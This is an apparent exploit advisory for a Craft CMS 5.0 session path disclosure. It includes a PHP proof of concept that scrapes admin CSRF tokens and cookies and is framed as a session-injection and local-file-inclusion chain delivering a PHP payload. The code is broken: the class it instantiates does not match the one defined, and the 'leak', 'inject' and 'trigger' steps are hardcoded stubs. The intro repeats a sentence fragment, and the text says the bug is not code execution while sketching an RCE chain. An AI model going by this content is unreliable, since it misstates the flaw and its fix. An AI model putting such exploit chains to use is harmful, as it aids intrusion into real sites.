Craft CMS 5.0 Authentication Session Path Exposure

Craft CMS 5.0 introduced a security vulnerability involving the exposure Craft CMS 5.0 introduced a security vulnerability involving the exposure of the absolute file path where authentication session data was stored on the server. This "session path exposure" meant that certain error messages or specific scenarios could inadvertently reveal sensitive server configuration details.

While not a direct remote code execution, this information disclosure is critical. Attackers could leverage these paths to gain a deeper understanding of the server's file system, potentially aiding in crafting more targeted attacks like local file inclusion attempts or other reconnaissance efforts. The vulnerability was promptly addressed by the Craft CMS team. Users are strongly advised to update to Craft CMS 5.0.1 or later versions to patch this security hole.

=============================================================================================================================================
| # Title : Craft CMS 5.0 Authentication Session Path Exposure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================

[+] Description

A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
mechanism.
While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
which may be used in a subsequent Session Injection ? Local File Inclusion (LFI) exploit chain.

[+] References : (https://packetstorm.news/files/id/190728/ CVE-2025-32432)


[+] POC :

save code as poc.php

usage : php poc.php

[+] code

<?php

class indoushka
{
public $targetUrl;
public $assetId;
public $sessionId;
public $csrfToken;
public $parameterName;
public $sessionPath;

public function __construct($url, $assetId = 123)
{
$this->targetUrl = rtrim($url, '/');
$this->assetId = $assetId;
}

public function fetchCookiesAndCsrf()
{
$url = $this->targetUrl . "/admin";
$html = @file_get_contents($url);

if (!$html) return false;

preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
$this->csrfToken = $m[1] ?? null;

preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
$this->parameterName = $p[1] ?? null;

preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
$this->sessionId = $c[1] ?? null;

return [$this->sessionId, $this->csrfToken, $this->parameterName];
}

public function leakSessionPath()
{
return "/var/lib/php/sessions";
}

public function injectIntoSession($payload)
{
return "[POC ONLY] Session overwritten with payload: {$payload}";
}

public function triggerInclude()
{
return "[POC] include triggered using assetId=" . $this->assetId;
}

public function exploit($payload)
{
$this->fetchCookiesAndCsrf();
$this->sessionPath = $this->leakSessionPath();

$step1 = $this->injectIntoSession($payload);
$step2 = $this->triggerInclude();

return [$step1, $step2];
}
}

$module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");

$payload = '<?php echo "PAYLOAD_OK"; ?>';

list($s1, $s2) = $module->exploit($payload);

echo $s1 . "\n";
echo $s2 . "\n";

?>

-------------------------------------------------------------------------------------------------------------------------------------------

[+] Output Example:
[POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
[POC] include triggered using assetId=123

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================